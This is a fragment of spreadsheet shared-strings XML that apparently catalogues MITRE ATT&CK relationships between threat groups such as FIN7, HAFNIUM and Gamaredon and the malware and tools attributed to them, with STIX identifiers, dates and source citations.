  <si>
    <t>relationship--1e809121-085d-419e-a763-c9e2309af074</t>
  </si>
  <si>
    <t>25 April 2019</t>
  </si>
  <si>
    <t>G1016</t>
  </si>
  <si>
    <t>FIN13</t>
  </si>
  <si>
    <t>intrusion-set--fd66436e-4d33-450e-ac4c-f7810f1c85f4</t>
  </si>
  <si>
    <t>(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--830ebcfb-58a9-4a11-b319-ca49ce7bfe1b</t>
  </si>
  <si>
    <t>27 July 2023</t>
  </si>
  <si>
    <t>01 August 2023</t>
  </si>
  <si>
    <t>relationship--055b4a0f-99aa-4d61-9aa4-a48fff427eb3</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--6736036b-1b05-4857-aded-75a7d42a8be2</t>
  </si>
  <si>
    <t>relationship--8a16836c-ad80-4c4f-8c4a-cfc639450a5a</t>
  </si>
  <si>
    <t>G0053</t>
  </si>
  <si>
    <t>FIN5</t>
  </si>
  <si>
    <t>intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>malware--0e18b800-906c-4e44-a143-b11c72b3448b</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--a2c9bae6-15aa-4ce0-8f4d-01b8fc32a36d</t>
  </si>
  <si>
    <t>24 April 2019</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) uses a customized version of PsExec.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--7e46e7c8-e48a-4860-bbcd-224a2d12284a</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>malware--9752aef4-a1f3-4328-929f-b64eb0536090</t>
  </si>
  <si>
    <t>(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--dff84383-c4c5-4974-a33d-9e43526abf49</t>
  </si>
  <si>
    <t>relationship--c4e81078-28b4-4a68-a946-458f4d122e39</t>
  </si>
  <si>
    <t>relationship--432f40d2-5309-4cc1-9544-2943233c3c2c</t>
  </si>
  <si>
    <t>relationship--ab83d817-57b8-4970-afc6-fbd70c6e3760</t>
  </si>
  <si>
    <t>G0037</t>
  </si>
  <si>
    <t>FIN6</t>
  </si>
  <si>
    <t>intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--7b7410ad-f09f-49e1-8077-9ffac9d77fcc</t>
  </si>
  <si>
    <t>relationship--6d520715-126a-4678-ba03-cbdd70fae8d0</t>
  </si>
  <si>
    <t>S0381</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>malware--432555de-63bf-4f2a-a3fa-f720a4561078</t>
  </si>
  <si>
    <t>(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--01c46868-c510-4df1-93fe-31d1fa9eb62e</t>
  </si>
  <si>
    <t>S0503</t>
  </si>
  <si>
    <t>FrameworkPOS</t>
  </si>
  <si>
    <t>malware--1cdbbcab-903a-414d-8eb0-439a97343737</t>
  </si>
  <si>
    <t>(Citation: SentinelOne FrameworkPOS September 2019)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--546bc8ea-9330-47a4-a5d1-d3fe89b1382b</t>
  </si>
  <si>
    <t>08 September 2020</t>
  </si>
  <si>
    <t>S0632</t>
  </si>
  <si>
    <t>GrimAgent</t>
  </si>
  <si>
    <t>malware--c9b99d03-ff11-4a48-95f0-82660d582c25</t>
  </si>
  <si>
    <t>(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--2f5dca6f-7a62-4933-a003-16dbb6d234cb</t>
  </si>
  <si>
    <t>16 July 2021</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>malware--5af7a825-2d9f-400d-931a-e00eb9e27f48</t>
  </si>
  <si>
    <t>relationship--ad7770c3-fe24-4285-9ce2-1616a1061472</t>
  </si>
  <si>
    <t>S0449</t>
  </si>
  <si>
    <t>Maze</t>
  </si>
  <si>
    <t>malware--d9f7383c-95ec-4080-bbce-121c9384457b</t>
  </si>
  <si>
    <t>(Citation: FireEye Maze May 2020)</t>
  </si>
  <si>
    <t>relationship--a5840067-79c4-4965-832c-ebca455cc17c</t>
  </si>
  <si>
    <t>09 September 2020</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--ed3bc4c8-f800-440f-8bb4-c5e8e4611eb3</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--5b8c6d74-6fa5-455b-8400-92fdda5c299e</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--9c8fa95a-cbbe-4ef6-999d-21b4080b54f6</t>
  </si>
  <si>
    <t>S0446</t>
  </si>
  <si>
    <t>Ryuk</t>
  </si>
  <si>
    <t>malware--a020a61c-423f-4195-8c46-ba1d21abba37</t>
  </si>
  <si>
    <t>relationship--e9f5096e-b9fc-459a-a303-88763b1269cc</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--6ed5961a-224a-419b-b696-8962813158f2</t>
  </si>
  <si>
    <t>G0046</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--210b5693-f039-4853-a0ea-70b4fa3abed9</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>malware--56d10a7f-bb42-4267-9b4c-63abb9c06010</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--ece11a34-960b-4ead-8258-02bee1bb0e41</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: DOJ FIN7 Aug 2018)(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--7577e14c-ceba-4646-98ce-41e7fa9ae851</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--9c61749d-ad78-476d-8cd6-ba4eafc8f74e</t>
  </si>
  <si>
    <t>23 September 2021</t>
  </si>
  <si>
    <t xml:space="preserve">
(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--707474c8-890d-4be2-81d5-f6a4902b1309</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>malware--04fc1842-f9e4-47cf-8cb8-5c61becad142</t>
  </si>
  <si>
    <t>(Citation: SecureList Griffon May 2019)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>relationship--08678e7f-c675-4f85-9593-f06cb90f6e44</t>
  </si>
  <si>
    <t>14 January 2022</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>HALFBAKED</t>
  </si>
  <si>
    <t>malware--0ced8926-914e-4c78-bc93-356fb90dbd1f</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--49d09bc3-cdc0-479b-8516-f64bff9b6757</t>
  </si>
  <si>
    <t>30 June 2019</t>
  </si>
  <si>
    <t>S0648</t>
  </si>
  <si>
    <t>JSS Loader</t>
  </si>
  <si>
    <t>malware--f559f945-eb8b-48b1-904c-68568deebed3</t>
  </si>
  <si>
    <t>relationship--3f4ff91e-a279-4777-b362-a57b0c4c098b</t>
  </si>
  <si>
    <t>S0681</t>
  </si>
  <si>
    <t>Lizar</t>
  </si>
  <si>
    <t>malware--f74a5069-015d-4404-83ad-5ca01056c0dc</t>
  </si>
  <si>
    <t>(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--d736ba76-c58b-4010-865e-68cd67fae4bf</t>
  </si>
  <si>
    <t>02 February 2022</t>
  </si>
  <si>
    <t>relationship--0ea53e8d-743e-4828-8c65-9b610593270a</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>malware--17e919aa-4a49-445c-b103-dbb8df9e7351</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>relationship--b6eb09bc-fef4-4cf3-b337-dfe6bd87ca35</t>
  </si>
  <si>
    <t>S0517</t>
  </si>
  <si>
    <t>Pillowmint</t>
  </si>
  <si>
    <t>malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--95d8ef7d-47b2-438d-921c-902dbb3467bb</t>
  </si>
  <si>
    <t>07 October 2020</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--6afed42c-6a42-402a-8964-7fcde5435336</t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>malware--065196de-d7e8-4888-acfb-b2134022ba1b</t>
  </si>
  <si>
    <t>relationship--cc99be16-89cc-427a-b348-2236add3d816</t>
  </si>
  <si>
    <t>S0496</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5</t>
  </si>
  <si>
    <t>(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>relationship--65adbdda-7069-40ed-9825-b79ec87e4916</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>malware--8fc6c9e7-a162-4ca4-a488-f1819e9a7b06</t>
  </si>
  <si>
    <t>(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--ceac12d5-3c40-42f6-a7df-0fa2e67bf1e8</t>
  </si>
  <si>
    <t>18 June 2019</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>malware--4f6aa78c-c3d4-4883-9840-96ca2f5d6d47</t>
  </si>
  <si>
    <t>relationship--e232f720-ab39-43f4-b419-ae8de115c5e6</t>
  </si>
  <si>
    <t>G0061</t>
  </si>
  <si>
    <t>FIN8</t>
  </si>
  <si>
    <t>intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826</t>
  </si>
  <si>
    <t>S1081</t>
  </si>
  <si>
    <t>BADHATCH</t>
  </si>
  <si>
    <t>malware--3553b49d-d4ae-4fb6-ab17-0adbc520c888</t>
  </si>
  <si>
    <t>(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--2275a778-0ba1-40a7-8421-1659dc2e38d4</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FIN8 July 2021)(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--febe1cf5-d8b5-4218-b32d-1e9ea10eab7f</t>
  </si>
  <si>
    <t>08 September 2021</t>
  </si>
  <si>
    <t>(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--bc1c5d97-5e95-4ba3-bf61-ffe3de56d508</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--bf26ba18-224d-421f-8fc7-3748dd2fe9bd</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c</t>
  </si>
  <si>
    <t>(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>relationship--5b5f2424-ff4e-43ab-a08f-fab2b284041d</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>malware--c4de7d83-e875-4c88-8b5d-06c41e5b7e79</t>
  </si>
  <si>
    <t>relationship--6b651165-e444-4272-a218-32e728558208</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--201802a3-afae-4c10-a125-0fc4fd62f1d2</t>
  </si>
  <si>
    <t>(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--d7dd3cdf-f928-4ca3-8fba-0c948eb36c16</t>
  </si>
  <si>
    <t>S0481</t>
  </si>
  <si>
    <t>Ragnar Locker</t>
  </si>
  <si>
    <t>malware--54895630-efd2-4608-9c24-319de972a9eb</t>
  </si>
  <si>
    <t>relationship--692e5a04-1f20-4597-8f64-15749c9b90e9</t>
  </si>
  <si>
    <t>S1085</t>
  </si>
  <si>
    <t>Sardonic</t>
  </si>
  <si>
    <t>malware--0c52f5bc-557d-4083-bd27-66d7cdb794bb</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--ce5e362a-3403-4d91-b362-cc5314b84a95</t>
  </si>
  <si>
    <t>relationship--76bd87d6-517e-4294-b4c5-a5a01308bf35</t>
  </si>
  <si>
    <t>G0137</t>
  </si>
  <si>
    <t>Ferocious Kitten</t>
  </si>
  <si>
    <t>intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--f76d5396-bce5-4bb8-85aa-75d9f1bec9b2</t>
  </si>
  <si>
    <t>S0652</t>
  </si>
  <si>
    <t>MarkiRAT</t>
  </si>
  <si>
    <t>malware--532c6004-b1e8-415b-9516-f7c14ba783b1</t>
  </si>
  <si>
    <t>relationship--3ccaef78-13bd-40e8-bb4b-b5d203303262</t>
  </si>
  <si>
    <t>G0117</t>
  </si>
  <si>
    <t>Fox Kitten</t>
  </si>
  <si>
    <t>intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--68efc544-05be-454e-86e9-18d55c7d0f2b</t>
  </si>
  <si>
    <t>S0556</t>
  </si>
  <si>
    <t>Pay2Key</t>
  </si>
  <si>
    <t>malware--77ca1aa3-280c-4b67-abaa-e8fb891a8f83</t>
  </si>
  <si>
    <t>(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--a391b999-a7f9-439d-bed5-0a0a13bb6f7d</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--d9a97894-9a90-43cd-b9b9-9d13545aeb5a</t>
  </si>
  <si>
    <t>29 December 2020</t>
  </si>
  <si>
    <t>S0508</t>
  </si>
  <si>
    <t>ngrok</t>
  </si>
  <si>
    <t>tool--2f7f03bb-f367-4a5a-ad9b-310a12a48906</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike PIONEER KITTEN August 2020)</t>
  </si>
  <si>
    <t>relationship--d18f30d7-deca-457c-b993-c87843ae3bab</t>
  </si>
  <si>
    <t>G0093</t>
  </si>
  <si>
    <t>GALLIUM</t>
  </si>
  <si>
    <t>intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258</t>
  </si>
  <si>
    <t>S0564</t>
  </si>
  <si>
    <t>BlackMould</t>
  </si>
  <si>
    <t>malware--63c4511b-2d6e-4bb2-b582-e2e99a8a467d</t>
  </si>
  <si>
    <t>(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--73bcd300-467e-4473-9ba7-772ae1c58610</t>
  </si>
  <si>
    <t>14 January 2021</t>
  </si>
  <si>
    <t>(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--109c7cc7-fec6-4d86-ae27-087cddb2670c</t>
  </si>
  <si>
    <t>relationship--b68c8dc2-e3da-4ce8-aef3-456b160e7fb5</t>
  </si>
  <si>
    <t>relationship--8f66e226-ecc4-408d-becb-4e9ad9c66b57</t>
  </si>
  <si>
    <t>(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>relationship--cc443415-7c35-49ab-92a9-3d0cfa68c7b2</t>
  </si>
  <si>
    <t>relationship--96db4cd3-0493-4944-b47c-15b7db6f0010</t>
  </si>
  <si>
    <t>22 July 2019</t>
  </si>
  <si>
    <t>relationship--090c11ed-8235-4c05-b553-749ee6497b0a</t>
  </si>
  <si>
    <t>S1031</t>
  </si>
  <si>
    <t>PingPull</t>
  </si>
  <si>
    <t>malware--3a0f6128-0a01-421d-8eca-e57d8671b1f1</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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G0115</t>
  </si>
  <si>
    <t>GOLD SOUTHFIELD</t>
  </si>
  <si>
    <t>intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133</t>
  </si>
  <si>
    <t>S0591</t>
  </si>
  <si>
    <t>ConnectWise</t>
  </si>
  <si>
    <t>tool--842976c7-f9c8-41b2-8371-41dc64fbe261</t>
  </si>
  <si>
    <t>(Citation: Anomali Static Kitten February 2021)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>relationship--ab641f16-7ba7-452f-b737-786e8c20d815</t>
  </si>
  <si>
    <t>18 March 2021</t>
  </si>
  <si>
    <t>(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--bff99f91-e1a9-4379-a2d9-5a99615a95d1</t>
  </si>
  <si>
    <t>G0047</t>
  </si>
  <si>
    <t>Gamaredon Group</t>
  </si>
  <si>
    <t>intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf</t>
  </si>
  <si>
    <t>(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--d77885d0-46e0-47b7-9cc2-6a396c570b12</t>
  </si>
  <si>
    <t>S0685</t>
  </si>
  <si>
    <t>PowerPunch</t>
  </si>
  <si>
    <t>malware--d52291b4-bb23-45a8-aef0-3dc7e986ba15</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--e1b5c306-3f7a-4d69-b30f-450b9054679a</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>Pteranodon</t>
  </si>
  <si>
    <t>malware--5f9f7648-04ba-4a9f-bb4c-2a13e74572bd</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>relationship--4f33536d-eb06-4eba-8765-4379e399f3b8</t>
  </si>
  <si>
    <t>S0686</t>
  </si>
  <si>
    <t>QuietSieve</t>
  </si>
  <si>
    <t>malware--03eb4a05-6a02-43f6-afb7-3c7835501828</t>
  </si>
  <si>
    <t>relationship--3151bdb1-baa0-4098-ac1c-a98cc72d0a84</t>
  </si>
  <si>
    <t>G0078</t>
  </si>
  <si>
    <t>Gorgon Group</t>
  </si>
  <si>
    <t>intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--6dfdfcc8-ff89-4991-830a-5ca31f43b251</t>
  </si>
  <si>
    <t>relationship--9839e4e4-06c2-4f6a-8fe0-bc556e547536</t>
  </si>
  <si>
    <t>relationship--bfe45239-7fa4-45a5-bb47-86c4ae46906c</t>
  </si>
  <si>
    <t>relationship--c3dd85c9-407c-4718-ba17-3c377c544dde</t>
  </si>
  <si>
    <t>04 June 2019</t>
  </si>
  <si>
    <t>G0043</t>
  </si>
  <si>
    <t>Group5</t>
  </si>
  <si>
    <t>intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40</t>
  </si>
  <si>
    <t>(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--e8ddf5f6-ec20-4eb6-bd22-b02f54a99693</t>
  </si>
  <si>
    <t>relationship--516fa29b-1a88-451c-a3ff-96af653b94ab</t>
  </si>
  <si>
    <t>G0125</t>
  </si>
  <si>
    <t>HAFNIUM</t>
  </si>
  <si>
    <t>intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--41561c6a-7749-4607-a8d1-c094631b4aaa</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--951774ce-173c-4aaf-a6e3-515ba497d523</t>
  </si>
  <si>
    <t>(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>relationship--4fd56621-eb11-43b9-b90f-e6739af43660</t>
  </si>
  <si>
    <t>relationship--577f5fe4-3fb4-4969-a5a4-5b7c1bc693a8</t>
  </si>
  <si>
    <t>S1011</t>
  </si>
  <si>
    <t>Tarrask</t>
  </si>
  <si>
    <t>malware--988976ff-beeb-4fb5-b07d-ca7437ea66e8</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Tarrask scheduled task) </t>
  </si>
  <si>
    <t>relationship--067696dc-a106-42d7-9fc9-31c4865879e8</t>
  </si>
  <si>
    <t>06 July 2022</t>
  </si>
  <si>
    <t>G1001</t>
  </si>
  <si>
    <t>HEXANE</t>
  </si>
  <si>
    <t>intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--2c9905cb-74f6-482e-b346-99be8105111c</t>
  </si>
  <si>
    <t>S1014</t>
  </si>
  <si>
    <t>DanBot</t>
  </si>
  <si>
    <t>malware--b8d48deb-450c-44f6-a934-ac8765aa89cb</t>
  </si>
  <si>
    <t>(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--5ffa504a-4458-49af-affd-f392bf5dd0ef</t>
  </si>
  <si>
    <t>03 June 2022</t>
  </si>
  <si>
    <t>S1021</t>
  </si>
  <si>
    <t>DnsSystem</t>
  </si>
  <si>
    <t>malware--8a2867f9-e8fc-4bf1-a860-ef6e46311900</t>
  </si>
  <si>
    <t>(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--4b4ccf27-d9e2-4cd9-b783-e8cdf354e6dc</t>
  </si>
  <si>
    <t>relationship--aa83b2a0-9941-461f-b9be-a758315f0c4d</t>
  </si>
  <si>
    <t>S1020</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t>malware--e7863f5d-cb6a-4f81-8804-0a635eec160a</t>
  </si>
  <si>
    <t>relationship--e966a89a-eef3-4be4-9ea1-ded6da1315cd</t>
  </si>
  <si>
    <t>S1015</t>
  </si>
  <si>
    <t>Milan</t>
  </si>
  <si>
    <t>malware--aea6d6b8-d832-4c90-a1bb-f52c6684db6c</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--0b0b4079-f926-4d86-9943-3074b487800c</t>
  </si>
  <si>
    <t>relationship--df6bb7e8-1971-4e8c-92cc-16727ac996dd</t>
  </si>
  <si>
    <t>(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--0ce9c0f3-6da9-402c-adc4-a001877e40e6</t>
  </si>
  <si>
    <t>07 June 2022</t>
  </si>
  <si>
    <t>relationship--f612ed23-f9c3-4527-b23a-3361f90f5fe1</t>
  </si>
  <si>
    <t>S1019</t>
  </si>
  <si>
    <t>Shark</t>
  </si>
  <si>
    <t>malware--99854cc8-f202-4e03-aa0a-4f8a4af93229</t>
  </si>
  <si>
    <t>relationship--40563725-bb7f-40a2-b2da-c4cfd7799c13</t>
  </si>
  <si>
    <t>(Citation: ClearSky Siamesekitten August 2021)(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--bed01612-b213-44dc-aabc-19ea87ef28b8</t>
  </si>
  <si>
    <t>24 June 2022</t>
  </si>
  <si>
    <t>relationship--14080577-f5de-46fd-b363-e3f4b4e73495</t>
  </si>
  <si>
    <t>G0126</t>
  </si>
  <si>
    <t>Higaisa</t>
  </si>
  <si>
    <t>intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--4032bd86-db32-4270-98a4-670be6992802</t>
  </si>
  <si>
    <t>05 March 2021</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--6eac5e98-29dd-4dae-8375-b459b87f28c8</t>
  </si>
  <si>
    <t>relationship--da2585bf-f31d-42c9-b488-e6cbab7bcd42</t>
  </si>
  <si>
    <t>G0100</t>
  </si>
  <si>
    <t>Inception</t>
  </si>
  <si>
    <t>intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--9b2caa3d-10ae-471b-b0b1-527fbcd006ec</t>
  </si>
  <si>
    <t>08 May 2020</t>
  </si>
  <si>
    <t>S0441</t>
  </si>
  <si>
    <t>PowerShower</t>
  </si>
  <si>
    <t>malware--53486bc7-7748-4716-8190-e4f1fde04c53</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--69ab51f8-fce5-436e-86a9-5d33d2332439</t>
  </si>
  <si>
    <t>S0442</t>
  </si>
  <si>
    <t>VBShower</t>
  </si>
  <si>
    <t>malware--8caa18af-4758-4fd3-9600-e8af579e89ed</t>
  </si>
  <si>
    <t>relationship--9b049c1e-0074-460e-86d3-338a33727172</t>
  </si>
  <si>
    <t>G0136</t>
  </si>
  <si>
    <t>IndigoZebra</t>
  </si>
  <si>
    <t>intrusion-set--e5603ea8-4c36-40e7-b7af-a077d24fedc1</t>
  </si>
  <si>
    <t>S0651</t>
  </si>
  <si>
    <t>BoxCaon</t>
  </si>
  <si>
    <t>malware--919a056e-5104-43b9-ad55-2ac929108b71</t>
  </si>
  <si>
    <t>(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--62d5e701-4fdc-4a1f-8c0a-3861e26d28ce</t>
  </si>
  <si>
    <t>(Citation: Securelist APT Trends Q2 2017)</t>
  </si>
  <si>
    <t>relationship--8e1cc8cd-8344-4ba4-9d61-05e63b54bc6b</t>
  </si>
  <si>
    <t>S0653</t>
  </si>
  <si>
    <t>xCaon</t>
  </si>
  <si>
    <t>malware--21583311-6321-4891-8a37-3eb4e57b0fb1</t>
  </si>
  <si>
    <t>relationship--51681b8d-71f1-425f-990a-4daa30e6dfa9</t>
  </si>
  <si>
    <t>G0119</t>
  </si>
  <si>
    <t>Indrik Spider</t>
  </si>
  <si>
    <t>intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07</t>
  </si>
  <si>
    <t>S0570</t>
  </si>
  <si>
    <t>BitPaymer</t>
  </si>
  <si>
    <t>malware--fa766a65-5136-4ff3-8429-36d08eaa0100</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>relationship--dcafed44-9d31-4d75-915f-660f5fd62fed</t>
  </si>
  <si>
